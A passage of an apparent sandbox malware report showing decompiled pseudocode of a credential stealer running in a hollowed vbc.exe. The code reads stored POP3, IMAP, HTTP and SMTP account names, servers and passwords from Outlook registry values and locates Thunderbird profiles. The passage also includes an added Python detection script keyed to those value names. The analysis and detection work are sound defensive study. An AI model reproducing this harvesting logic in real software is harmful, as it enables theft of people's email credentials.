                                                                                                                                                                        					_t99 = strlen(??) + 1; // 0x1
                                                                                                                                                                        					_t223 = _t204 + _t99 - 0x104;
                                                                                                                                                                        					if(_t204 + _t99 >= 0x104) {
                                                                                                                                                                        						 *((char*)(_t194 + 0x264)) = 0;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						E004062B7(_t194 + 0x264, 0x418660, "report.html");
                                                                                                                                                                        					}
                                                                                                                                                                        					_push(1);
                                                                                                                                                                        					_t178 = 0x30;
                                                                                                                                                                        					E0040A175( *((intOrPtr*)(_t194 + 0x370)), _t178);
                                                                                                                                                                        					E0040A175( *((intOrPtr*)(_t194 + 0x370)), 1, ( *(_t194 + 0x36c))[1]);
                                                                                                                                                                        					_t149 = RegisterWindowMessageA("commdlg_FindReplace");
                                                                                                                                                                        					_t205 = _t194;
                                                                                                                                                                        					 *(_t194 + 0x374) = _t149;
                                                                                                                                                                        					E0040A3E9(0, 1, _t205, _t223);
                                                                                                                                                                        					E00401E4A(_t223,  *((intOrPtr*)(_t205 + 0x370)) + 0xb20);
                                                                                                                                                                        					 *(_t208 + 0x60) = 0x12c;
                                                                                                                                                                        					 *((intOrPtr*)(_t208 + 0x64)) = 0x400;
                                                                                                                                                                        					SendMessageA( *(_t205 + 0x114), 0x404, 2, _t208 + 0x60);
                                                                                                                                                                        					return SendMessageA( *(_t205 + 0x114), 0x401, 0x1001, 0);
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t207 = _t200 + 0xc;
                                                                                                                                                                        					 *((intOrPtr*)(_t208 + 0x74)) = _t173;
                                                                                                                                                                        					do {
                                                                                                                                                                        						_t173 =  *((intOrPtr*)(_t207 - 8));
                                                                                                                                                                        						E0040492F( *((intOrPtr*)(_t207 + 4)),  *((intOrPtr*)(_t207 - 8)),  *((intOrPtr*)(_t208 + 0x68)),  *((intOrPtr*)(_t207 - 0xc)),  *((intOrPtr*)(_t207 - 4)),  *_t207);
                                                                                                                                                                        						_t211 = _t211 + 0x10;
                                                                                                                                                                        						_t207 = _t207 + 0x14;
                                                                                                                                                                        						_t82 = _t208 + 0x74;
                                                                                                                                                                        						 *_t82 =  *((intOrPtr*)(_t208 + 0x74)) - 1;
                                                                                                                                                                        					} while ( *_t82 != 0);
                                                                                                                                                                        					goto L3;
                                                                                                                                                                        				}
                                                                                                                                                                        			}
                                                                                                                                                                        0x0040a9f4
                                                                                                                                                                        0x0040aa41
                                                                                                                                                                        0x0040aa79
                                                                                                                                                                        0x0040aa7e
                                                                                                                                                                        0x0040aa84
                                                                                                                                                                        0x0040aa8c
                                                                                                                                                                        0x0040aa98
                                                                                                                                                                        0x0040aa9b
                                                                                                                                                                        0x0040aac4
                                                                                                                                                                        0x0040aac4
                                                                                                                                                                        0x0040aacc
                                                                                                                                                                        0x0040aae7
                                                                                                                                                                        0x0040aaf3
                                                                                                                                                                        0x0040aaf5
                                                                                                                                                                        0x0040aaf5
                                                                                                                                                                        0x0040aafc
                                                                                                                                                                        0x0040ab02
                                                                                                                                                                        0x0040ab08
                                                                                                                                                                        0x0040ab11
                                                                                                                                                                        0x0040ab26
                                                                                                                                                                        0x0040ab13
                                                                                                                                                                        0x0040ab16
                                                                                                                                                                        0x0040ab22
                                                                                                                                                                        0x0040ab18
                                                                                                                                                                        0x0040ab1d
                                                                                                                                                                        0x0040ab1d
                                                                                                                                                                        0x0040ab16
                                                                                                                                                                        0x0040ab2b
                                                                                                                                                                        0x0040ab30
                                                                                                                                                                        0x0040ab31
                                                                                                                                                                        0x0040ab3a
                                                                                                                                                                        0x0040ab46
                                                                                                                                                                        0x0040ab46
                                                                                                                                                                        0x0040ab4f
                                                                                                                                                                        0x0040ab5a
                                                                                                                                                                        0x0040ab6c
                                                                                                                                                                        0x0040ab7d
                                                                                                                                                                        0x0040ab7f
                                                                                                                                                                        0x0040ab8d
                                                                                                                                                                        0x0040ab95
                                                                                                                                                                        0x0040ab95
                                                                                                                                                                        0x0040ab8d
                                                                                                                                                                        0x0040aba1
                                                                                                                                                                        0x0040aba3
                                                                                                                                                                        0x0040abaf
                                                                                                                                                                        0x0040abb3
                                                                                                                                                                        0x0040abb9
                                                                                                                                                                        0x0040abd4
                                                                                                                                                                        0x0040abbb
                                                                                                                                                                        0x0040abcb
                                                                                                                                                                        0x0040abd1
                                                                                                                                                                        0x0040abe0
                                                                                                                                                                        0x0040abe4
                                                                                                                                                                        0x0040abe5
                                                                                                                                                                        0x0040abfc
                                                                                                                                                                        0x0040ac06
                                                                                                                                                                        0x0040ac0e
                                                                                                                                                                        0x0040ac10
                                                                                                                                                                        0x0040ac16
                                                                                                                                                                        0x0040ac27
                                                                                                                                                                        0x0040ac43
                                                                                                                                                                        0x0040ac4a
                                                                                                                                                                        0x0040ac51
                                                                                                                                                                        0x0040ac6d
                                                                                                                                                                        0x0040aa9d
                                                                                                                                                                        0x0040aa9d
                                                                                                                                                                        0x0040aaa0
                                                                                                                                                                        0x0040aaa3
                                                                                                                                                                        0x0040aaab
                                                                                                                                                                        0x0040aab4
                                                                                                                                                                        0x0040aab9
                                                                                                                                                                        0x0040aabc
                                                                                                                                                                        0x0040aabf
                                                                                                                                                                        0x0040aabf
                                                                                                                                                                        0x0040aabf
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040aaa3

APIs
  • Part of subcall function 00407D23: LoadMenuA.USER32 ref: 00407D2B
  • Part of subcall function 00407D23: sprintf.MSVCRT ref: 00407D4E
• SetMenu.USER32(?,00000000), ref: 0040A9C1
• #6.COMCTL32(50000000,0041344F,?,00000101), ref: 0040A9DC
• SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040A9F4
• LoadImageA.USER32 ref: 0040AA0A
• CreateToolbarEx.COMCTL32(?,50010900,00000102,00000007,00000000,00000000,?,00000008,00000010,00000010,00000070,00000010,00000014), ref: 0040AA34
• CreateWindowExA.USER32 ref: 0040AA6A
• LoadIconA.USER32(00000066,00000000), ref: 0040AAD9
• ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 0040AAE7
• _stricmp.MSVCRT(0041344F,/noloadsettings), ref: 0040AB31
• RegDeleteKeyA.ADVAPI32(80000001,0041344F), ref: 0040AB46
• SetFocus.USER32(?,00000000), ref: 0040AB6C
• GetFileAttributesA.KERNEL32(00418660), ref: 0040AB85
• GetTempPathA.KERNEL32(00000104,00418660), ref: 0040AB95
• strlen.MSVCRT ref: 0040AB9C
• strlen.MSVCRT ref: 0040ABAA
• RegisterWindowMessageA.USER32(commdlg_FindReplace,?,00000001), ref: 0040AC06
  • Part of subcall function 0040492F: strlen.MSVCRT ref: 0040494C
  • Part of subcall function 0040492F: SendMessageA.USER32(00000000,0000101B,00000000,?), ref: 00404970
• SendMessageA.USER32(?,00000404,00000002,?), ref: 0040AC51
• SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040AC64
Strings
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: Message$Send$Loadstrlen$CreateIconImageMenuWindow$AttributesDeleteFileFocusList_PathRegisterReplaceTempToolbar_stricmpsprintf
• String ID: /noloadsettings$SysListView32$commdlg_FindReplace$report.html
• API String ID: 873469642-933021314
• Opcode ID: f75555cb15c1b63825adbd58fa812571469ae2ca081b8c073a2cdb6d326835af
• Instruction ID: e1998a72efec4b56c1f9895f5ce6fdd1159dce7011e853ef75bd655fd4d55b37
• Opcode Fuzzy Hash: f75555cb15c1b63825adbd58fa812571469ae2ca081b8c073a2cdb6d326835af
• Instruction Fuzzy Hash: DBB10071644388EFEB16CF74C845BDABFB5BF14304F00406AF644A7292C7B9A954CB5A
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 35%
E004025C5(void* __ecx, void* __fp0) {
	void* __esi;
	void* _t58;
	void* _t59;
	void* _t67;
	void* _t70;
	void* _t73;
	void* _t87;
	signed int _t90;
	void* _t92;
	signed int _t96;
	intOrPtr _t100;
	intOrPtr _t101;
	void* _t103;
	void* _t105;
	void* _t106;
	void* _t108;
	void* _t114;

	_t114 = __fp0;
	_t92 = __ecx;
	_t103 = _t105 - 0x6c;
	_t106 = _t105 - 0x474;
	 *(_t103 + 0x4c) = "POP3 User Name";
	 *(_t103 + 0x50) = "IMAP User Name";
	 *(_t103 + 0x54) = "HTTPMail User Name";
	 *(_t103 + 0x58) = "SMTP USer Name";
	 *(_t103 + 0x1c) = "POP3 Server";
	 *(_t103 + 0x20) = "IMAP Server";
	 *(_t103 + 0x24) = "HTTPMail Server";
	 *(_t103 + 0x28) = "SMTP Server";
	 *(_t103 + 0x3c) = "POP3 Password2";
	 *(_t103 + 0x40) = "IMAP Password2";
	 *(_t103 + 0x44) = "HTTPMail Password2";
	 *(_t103 + 0x48) = "SMTP Password2";
	 *(_t103 + 0x2c) = "POP3 Port";
	 *(_t103 + 0x30) = "IMAP Port";
	 *(_t103 + 0x34) = "HTTPMail Port";
	 *(_t103 + 0x38) = "SMTP Port";
	 *(_t103 + 0x5c) = "POP3 Secure Connection";
	 *(_t103 + 0x60) = "IMAP Secure Connection";
	 *(_t103 + 0x64) = "HTTPMail Secure Connection";
	 *(_t103 + 0x68) = "SMTP Secure Connection";
	_t90 = 0;
	do {
		 *(_t103 - 0x64) = 0;
                                                                                                                                                                        					memset(_t103 - 0x63, 0, 0x7f);
                                                                                                                                                                        					_push(_t103 - 0x64);
                                                                                                                                                                        					_t96 = _t90 << 2;
                                                                                                                                                                        					_push( *((intOrPtr*)(_t103 + _t96 + 0x4c)));
                                                                                                                                                                        					_push( *((intOrPtr*)(_t103 + 0x78)));
                                                                                                                                                                        					_t58 = 0x7f;
                                                                                                                                                                        					_t59 = E0040F1F1(_t58, _t92);
                                                                                                                                                                        					_t106 = _t106 + 0x18;
                                                                                                                                                                        					if(_t59 == 0) {
                                                                                                                                                                        						E00402197(_t103 - 0x408);
                                                                                                                                                                        						strcpy(_t103 - 0x1f4, _t103 - 0x64);
                                                                                                                                                                        						_t100 =  *((intOrPtr*)(_t103 + 0x78));
                                                                                                                                                                        						 *((intOrPtr*)(_t103 - 0x37c)) =  *((intOrPtr*)(_t103 + 0x7c));
                                                                                                                                                                        						_t34 = _t90 + 1; // 0x1
                                                                                                                                                                        						 *((intOrPtr*)(_t103 - 0x1f8)) = _t34;
                                                                                                                                                                        						_push(_t103 - 0x2f8);
                                                                                                                                                                        						_push( *((intOrPtr*)(_t103 + _t96 + 0x1c)));
                                                                                                                                                                        						_push(_t100);
                                                                                                                                                                        						_t67 = 0x7f;
                                                                                                                                                                        						E0040F1F1(_t67, _t92);
                                                                                                                                                                        						_push(_t103 - 0x3fc);
                                                                                                                                                                        						_push("SMTP Display Name");
                                                                                                                                                                        						_push(_t100);
                                                                                                                                                                        						_t70 = 0x7f;
                                                                                                                                                                        						E0040F1F1(_t70, _t92);
                                                                                                                                                                        						_push(_t103 - 0x378);
                                                                                                                                                                        						_push("SMTP Email Address");
                                                                                                                                                                        						_push(_t100);
                                                                                                                                                                        						_t73 = 0x7f;
                                                                                                                                                                        						E0040F1F1(_t73, _t92);
                                                                                                                                                                        						_t108 = _t106 + 0x2c;
                                                                                                                                                                        						if(_t90 != 3) {
                                                                                                                                                                        							_push(_t103 - 0x278);
                                                                                                                                                                        							_push("SMTP Server");
                                                                                                                                                                        							_push(_t100);
                                                                                                                                                                        							_t87 = 0x7f;
                                                                                                                                                                        							E0040F1F1(_t87, _t92);
                                                                                                                                                                        							_t108 = _t108 + 0xc;
                                                                                                                                                                        						}
                                                                                                                                                                        						E0040F1CA(_t92, _t100,  *((intOrPtr*)(_t103 + _t96 + 0x2c)), _t103 - 0x74);
                                                                                                                                                                        						E0040F1CA(_t92, _t100,  *((intOrPtr*)(_t103 + _t96 + 0x5c)), _t103 - 0x70);
                                                                                                                                                                        						_t106 = _t108 + 0x18;
                                                                                                                                                                        						_t101 =  *((intOrPtr*)(_t103 + 0x74));
                                                                                                                                                                        						E0040242B(_t101, _t92, _t100,  *((intOrPtr*)(_t103 + _t96 + 0x3c)), _t103 - 0x174, 0);
                                                                                                                                                                        						strcpy(_t103 - 0xf4, _t101 + 0xa9c);
                                                                                                                                                                        						_pop(_t92);
                                                                                                                                                                        						_t59 = E004023C6(_t103 - 0x408, _t114, _t101);
                                                                                                                                                                        					}
                                                                                                                                                                        					_t90 = _t90 + 1;
                                                                                                                                                                        				} while (_t90 < 4);
                                                                                                                                                                        				return _t59;
                                                                                                                                                                        			}

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 0040266D
                                                                                                                                                                          • Part of subcall function 0040F1F1: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040F582,?,?,?,?,0040F582,00000000,?,?), ref: 0040F20C
                                                                                                                                                                        • strcpy.MSVCRT(?,?,?,?,?,73AFED80,?,00000000), ref: 004026AB
                                                                                                                                                                        • strcpy.MSVCRT(?,?), ref: 00402768
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: strcpy$QueryValuememset
                                                                                                                                                                        • String ID: HTTPMail Password2$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP Password2$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3 Password2$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$SMTP Display Name$SMTP Email Address$SMTP Password2$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                                                                                                        • API String ID: 3373037483-1627711381
                                                                                                                                                                        • Opcode ID: e3f80b658476a1f582484f23fef2e1cdc73789c59224b923ecc992e764de9bf2
                                                                                                                                                                        • Instruction ID: 73c24e987151304ffccade67a91af9495e30ddb8d36a1dc6faba254672d7bb93
                                                                                                                                                                        • Opcode Fuzzy Hash: e3f80b658476a1f582484f23fef2e1cdc73789c59224b923ecc992e764de9bf2
                                                                                                                                                                        • Instruction Fuzzy Hash: 534143B190021CBEDB31DF51CD49ADE7BA8AF04348F50457BF918A7291D3799A88CF98
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 97%
    E0040278F(void* __fp0) {
        void* __esi;
        void* _t66;
        signed int _t95;    // loop index over account types: 0 = POP3, 1 = IMAP, 2 = HTTP, 3 = SMTP
        void* _t98;
        signed int _t103;   // _t95 << 2: byte offset into the 4-entry name tables below (used but not declared by the decompiler)
        intOrPtr _t107;
        void* _t109;
        void* _t111;
        void* _t112;
        void* _t119;
        intOrPtr _t37;      // used but not declared by the decompiler

        _t119 = __fp0;
        _t109 = _t111 - 0x70;     // frame base; the value-name tables live at _t109+0x20 .. _t109+0x6c
        _t112 = _t111 - 0x474;
        // Six parallel tables of Outlook account value names, one 4-byte slot per account type.
        // Every table is indexed below as _t109 + (_t95 << 2) + <table offset>.
        // +0x40: stored password
         *(_t109 + 0x40) = "POP3 Password";
         *(_t109 + 0x44) = "IMAP Password";
         *(_t109 + 0x48) = "HTTP Password";
         *(_t109 + 0x4c) = "SMTP Password";
        // +0x50: user name
         *(_t109 + 0x50) = "POP3 User";
         *(_t109 + 0x54) = "IMAP User";
         *(_t109 + 0x58) = "HTTP User";
         *(_t109 + 0x5c) = "SMTP User";
        // +0x20: server
         *(_t109 + 0x20) = "POP3 Server";
         *(_t109 + 0x24) = "IMAP Server";
         *(_t109 + 0x28) = "HTTP Server URL";
         *(_t109 + 0x2c) = "SMTP Server";
        // +0x30: port
         *(_t109 + 0x30) = "POP3 Port";
         *(_t109 + 0x34) = "IMAP Port";
         *(_t109 + 0x38) = "HTTP Port";
         *(_t109 + 0x3c) = "SMTP Port";
        // +0x60: SPA / SSL flag
         *(_t109 + 0x60) = "POP3 Use SPA";
         *(_t109 + 0x64) = "IMAP Use SPA";
         *(_t109 + 0x68) = "HTTPMail Use SSL";
         *(_t109 + 0x6c) = "SMTP Use SSL";
        _t95 = 0;
        do {
            // Zero the 0x80-byte string buffer at _t109-0x60; 0x7f is also the cbMultiByte
            // that E00402963 passes to WideCharToMultiByte (see APIs below).
             *(_t109 - 0x60) = 0;
            memset(_t109 - 0x5f, 0, 0x7f);
            _t112 = _t112 + 0xc;
            _t103 = _t95 << 2;
            // E00402963(dst, hKey, valueName) wraps RegQueryValueExA + WideCharToMultiByte (see APIs below).
            // The argument at _t109+0x7c is passed wherever a key handle is needed, so it is inferred to be
            // the caller-supplied registry key of the account being read.
            // An account is only recorded when its "<proto> User" value exists.
            _t66 = E00402963(_t109 - 0x60,  *((intOrPtr*)(_t109 + 0x7c)),  *((intOrPtr*)(_t109 + (_t95 << 2) + 0x50)));
            if(_t66 != 0) {
                E00402197(_t109 - 0x404);                // initialise the per-account record at _t109-0x404 (body not in this excerpt)
                strcpy(_t109 - 0x1f0, _t109 - 0x60);     // user name into the record
                _t107 =  *((intOrPtr*)(_t109 + 0x78));   // caller-supplied context object (arg at +0x78); two of its fields are copied below
                _pop(_t98);
                 *((intOrPtr*)(_t109 - 0x378)) =  *((intOrPtr*)(_t107 + 0xb1c));
                _t37 = _t95 + 1; // 0x1
                 *((intOrPtr*)(_t109 - 0x1f4)) = _t37;   // account type stored as index + 1
                E00402963(_t109 - 0x2f4,  *((intOrPtr*)(_t109 + 0x7c)),  *((intOrPtr*)(_t109 + _t103 + 0x20)));   // "<proto> Server"
                E00402963(_t109 - 0x3f8,  *((intOrPtr*)(_t109 + 0x7c)), "Display Name");
                E00402963(_t109 - 0x374,  *((intOrPtr*)(_t109 + 0x7c)), "Email");
                if(_t95 != 3) {
                    // POP3/IMAP/HTTP accounts keep their outgoing server separately; the SMTP entry (index 3)
                    // already read "SMTP Server" through the table above.
                    E00402963(_t109 - 0x274,  *((intOrPtr*)(_t109 + 0x7c)), "SMTP Server");
                    E0040F1CA(_t98,  *((intOrPtr*)(_t109 + 0x7c)), "SMTP Port", _t109 - 0x68);   // E0040F1CA: RegQueryValueExA for a numeric value (see APIs below)
                    _t112 = _t112 + 0xc;
                }
                E0040F1CA(_t98,  *((intOrPtr*)(_t109 + 0x7c)),  *((intOrPtr*)(_t109 + _t103 + 0x30)), _t109 - 0x70);   // "<proto> Port"
                E0040F1CA(_t98,  *((intOrPtr*)(_t109 + 0x7c)),  *((intOrPtr*)(_t109 + _t103 + 0x60)), _t109 - 0x6c);   // "<proto> Use SPA" / "Use SSL"
                _t112 = _t112 + 0x18;
                // "<proto> Password": the stored credential is read into the record at _t109-0x170 (E0040242B body not in this excerpt)
                E0040242B(_t107, _t98,  *((intOrPtr*)(_t109 + 0x7c)),  *((intOrPtr*)(_t109 + _t103 + 0x40)), _t109 - 0x170, 1);
                strcpy(_t109 - 0xf0, _t107 + 0xa9c);
                _t66 = E004023C6(_t109 - 0x404, _t119, _t107);   // hand the completed record off (body not in this excerpt)
            }
            _t95 = _t95 + 1;
        } while (_t95 < 4);
        return _t66;
    }

Address column of the listing above (per-statement addresses, 0x0040278f to 0x00402960):
0x0040278f 0x00402790 0x00402794 0x0040279d 0x004027a4 0x004027ab 0x004027b2 0x004027b9
0x004027c0 0x004027c7 0x004027ce 0x004027d5 0x004027dc 0x004027e3 0x004027ea 0x004027f1
0x004027f8 0x004027ff 0x00402806 0x0040280d 0x00402814 0x0040281b 0x00402822 0x00402829
0x0040282b 0x00402833 0x00402837 0x0040283c 0x00402841 0x0040284e 0x00402855 0x00402861
0x00402871 0x00402876 0x00402880 0x00402885 0x0040288e 0x00402891 0x0040289d 0x004028b0
0x004028c3 0x004028cb 0x004028db 0x004028ec 0x004028f1 0x004028f1 0x004028ff 0x0040290f
0x00402914 0x00402929 0x0040293c 0x0040294a 0x0040294a 0x0040294f 0x00402950 0x00402960

APIs
• memset.MSVCRT ref: 00402837
  • Part of subcall function 00402963: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 00402994
• strcpy.MSVCRT(?,?,73AFED80,?,00000000), ref: 00402871
  • Part of subcall function 00402963: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004029C2
• strcpy.MSVCRT(?,?,?,?,?,?,?,?,73AFED80,?,00000000), ref: 0040293C
  • Part of subcall function 0040F1CA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402904,?,?,?,?,00402904,?,?), ref: 0040F1E9
Strings
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: QueryValuestrcpy$ByteCharMultiWidememset
• String ID: Display Name$Email$HTTP Password$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP Password$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3 Password$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$SMTP Password$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
• API String ID: 1302727986-4086712241
• Opcode ID: 832ecfa302c2265efd1f56203e1d837ddfbcb2d0fb3c2068bcbc5ca0dd018d8a
• Instruction ID: 308be4cc5b828d0a3e021f21c5187f9384b0cc6d4098b7245e54e25f5b72303c
• Opcode Fuzzy Hash: 832ecfa302c2265efd1f56203e1d837ddfbcb2d0fb3c2068bcbc5ca0dd018d8a
• Instruction Fuzzy Hash: D9410BB150024DABCF21EF61DD499DD7BA9FF04309F10816BF92466291D3B99A89CF48
Uniqueness

Uniqueness Score: -1.00%
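The detection opportunity in E0040278F is the combination of registry reads it makes per account: a process other than Outlook querying a "<proto> Password" value together with the user and server values of the same account. The following Python is an added example, not code from the Joe Sandbox report or from the analysed sample. It reuses the exact value names the function stages and runs them over constructed, Sysmon-style registry events; the event line format, PIDs, image paths and the Outlook profile key path are assumptions of the example.

```python
"""Hunt for MailPassView-style Outlook account harvesting in registry-access telemetry.

Added example, not code from the Joe Sandbox report or from the analysed sample. The
value names are the ones E0040278F stages in its lookup tables; the event line format,
process IDs, image paths and the Outlook profile key path are constructed for this
example and are not taken from the report.
"""
import re
from collections import defaultdict

# Value names exactly as E0040278F loads them, in the order it iterates
# (0 = POP3, 1 = IMAP, 2 = HTTP, 3 = SMTP).
ACCOUNT_TYPES = ("POP3", "IMAP", "HTTP", "SMTP")
PASSWORD_VALUES = {p + " Password" for p in ACCOUNT_TYPES}
USER_VALUES = {p + " User" for p in ACCOUNT_TYPES}
SERVER_VALUES = {"POP3 Server", "IMAP Server", "HTTP Server URL", "SMTP Server"}
PORT_VALUES = {p + " Port" for p in ACCOUNT_TYPES}
FLAG_VALUES = {"POP3 Use SPA", "IMAP Use SPA", "HTTPMail Use SSL", "SMTP Use SSL"}
IDENTITY_VALUES = {"Display Name", "Email"}
ALL_VALUES = (PASSWORD_VALUES | USER_VALUES | SERVER_VALUES | PORT_VALUES
              | FLAG_VALUES | IDENTITY_VALUES)

# Assumed event shape (Sysmon-like, constructed for this example):
#   <timestamp> pid=<n> image=<path without spaces> op=<RegOp> path=<key>\<value name>
EVENT_RE = re.compile(r"pid=(?P<pid>\d+)\s+image=(?P<image>\S+)\s+op=(?P<op>\S+)\s+path=(?P<path>.+)$")


def parse_event(line):
    """Split one telemetry line into its fields; None for lines that do not match."""
    m = EVENT_RE.search(line)
    if not m:
        return None
    key, _, value = m.group("path").strip().rpartition("\\")
    return {"pid": int(m.group("pid")), "image": m.group("image"),
            "op": m.group("op"), "key": key, "value": value}


def score_process(values):
    """Classify the set of Outlook value names one process queried.

    'harvest'    : a password value plus the user or server value of an account,
                   which is the per-account combination E0040278F reads.
    'suspicious' : a password value on its own.
    'benign'     : no password value read.
    """
    pw = values & PASSWORD_VALUES
    user = values & USER_VALUES
    server = values & SERVER_VALUES
    reasons = []
    if pw:
        reasons.append("read password value(s): " + ", ".join(sorted(pw)))
    if user and server:
        reasons.append("read matching user and server values")
    if values & IDENTITY_VALUES:
        reasons.append("read Display Name / Email")
    if pw and (user or server):
        return "harvest", reasons
    if pw:
        return "suspicious", reasons
    return "benign", reasons


def hunt(lines, allow_images=("outlook.exe",)):
    """Group RegQueryValue events by process; return {pid: (image, verdict, reasons)}."""
    per_proc = defaultdict(set)
    images = {}
    for line in lines:
        ev = parse_event(line)
        if not ev or ev["op"] != "RegQueryValue" or ev["value"] not in ALL_VALUES:
            continue
        per_proc[ev["pid"]].add(ev["value"])
        images[ev["pid"]] = ev["image"]
    findings = {}
    for pid, values in per_proc.items():
        image = images[pid]
        # Allowlist by image basename only; a hollowed process keeps its host's image
        # name, so keep this list short and alert on everything else.
        if image.lower().rsplit("\\", 1)[-1] in allow_images:
            continue
        verdict, reasons = score_process(values)
        if verdict != "benign":
            findings[pid] = (image, verdict, reasons)
    return findings


# --- constructed sample telemetry (assumed key path, PIDs and images; not from the report) ---
OUTLOOK_ACCOUNT_KEY = (r"HKCU\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook"
                       r"\9375CFF0413111d3B88A00104B2A6676\00000002")
VBC = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"   # hollowed host, as in the dump source


def make_event(pid, image, value, key=OUTLOOK_ACCOUNT_KEY):
    return "2022-01-21T10:15:02 pid=%d image=%s op=RegQueryValue path=%s\\%s" % (pid, image, key, value)


SAMPLE_EVENTS = (
    # the reads E0040278F makes for the POP3 account (index 0), including the extra SMTP fields
    [make_event(4132, VBC, v) for v in ("POP3 User", "POP3 Server", "Display Name", "Email",
                                        "SMTP Server", "SMTP Port", "POP3 Port",
                                        "POP3 Use SPA", "POP3 Password")]
    + [make_event(2208, r"C:\Office16\OUTLOOK.EXE", v) for v in ("POP3 User", "POP3 Password")]
    + [make_event(5010, r"C:\Windows\explorer.exe", "Display Name")]
    + [make_event(6001, r"C:\Users\Public\update.exe", "SMTP Password")]
)

if __name__ == "__main__":
    for pid, (image, verdict, reasons) in hunt(SAMPLE_EVENTS).items():
        print(pid, image, verdict, "; ".join(reasons))
```

The allowlist is deliberately narrow. The snapshot file name above shows this code executing inside vbc.exe, the hollowed host process, so an image-based exclusion that covers .NET build tools or other "known good" binaries would hide exactly this sample; a compiler binary touching Outlook profile values is itself the alert.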

C-Code - Quality: 81%
    E0040FAA6(CHAR* __eax) {
        void* _v8;
        int _v12;
        void _v267;
        char _v268;
        void _v531;
        char _v532;
        void _v787;
        char _v788;
        void _v1051;
        char _v1052;
        void _v2075;
        char _v2076;
        void* __esi;
        void* _t45;
        void* _t59;
        char* _t60;
        char* _t71;
        char* _t75;
        void* _t84;
        CHAR* _t89;
        void* _t90;
        void* _t91;
        void* _t92;
        void* _t93;
                                                                                                                                                                        
                                                                                                                                                                        				_t89 = __eax;
                                                                                                                                                                        				_v1052 = 0;
                                                                                                                                                                        				memset( &_v1051, 0, 0x104);
                                                                                                                                                                        				_v788 = 0;
                                                                                                                                                                        				memset( &_v787, 0, 0xff);
                                                                                                                                                                        				 *_t89 = 0;
                                                                                                                                                                        				_t45 = E0040F1B0(0x80000002, "SOFTWARE\\Mozilla",  &_v8);
                                                                                                                                                                        				_t91 = _t90 + 0x24;
                                                                                                                                                                        				if(_t45 != 0) {
                                                                                                                                                                        					L12:
                                                                                                                                                                        					strcpy(_t89,  &_v1052);
                                                                                                                                                                        					if( *_t89 == 0) {
                                                                                                                                                                        						ExpandEnvironmentStringsA("%programfiles%\\Mozilla Thunderbird", _t89, 0x104);
                                                                                                                                                                        						if(E0040FA2B(_t89) == 0) {
                                                                                                                                                                        							 *_t89 = 0;
                                                                                                                                                                        						}
                                                                                                                                                                        						if( *_t89 == 0) {
                                                                                                                                                                        							E0040617C(_t89);
                                                                                                                                                                        							if(E0040FA2B(_t89) == 0) {
                                                                                                                                                                        								 *_t89 = 0;
                                                                                                                                                                        							}
                                                                                                                                                                        							if( *_t89 == 0) {
                                                                                                                                                                        								GetCurrentDirectoryA(0x104, _t89);
                                                                                                                                                                        								if(E0040FA2B(_t89) == 0) {
                                                                                                                                                                        									 *_t89 = 0;
                                                                                                                                                                        								}
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        					return 0 |  *_t89 != 0x00000000;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_v268 = 0;
                                                                                                                                                                        					memset( &_v267, 0, 0xff);
                                                                                                                                                                        					_v12 = 0;
                                                                                                                                                                        					_t59 = E0040F276(_v8, 0,  &_v268);
                                                                                                                                                                        					_t92 = _t91 + 0x18;
                                                                                                                                                                        					while(_t59 == 0) {
                                                                                                                                                                        						_push(7);
                                                                                                                                                                        						_t60 =  &_v268;
                                                                                                                                                                        						_push("mozilla");
                                                                                                                                                                        						_push(_t60);
                                                                                                                                                                        						L00412114();
                                                                                                                                                                        						_t93 = _t92 + 0xc;
                                                                                                                                                                        						if(_t60 == 0) {
                                                                                                                                                                        							_v532 = 0;
                                                                                                                                                                        							memset( &_v531, 0, 0x104);
                                                                                                                                                                        							_v2076 = 0;
                                                                                                                                                                        							memset( &_v2075, 0, 0x3ff);
                                                                                                                                                                        							_push( &_v268);
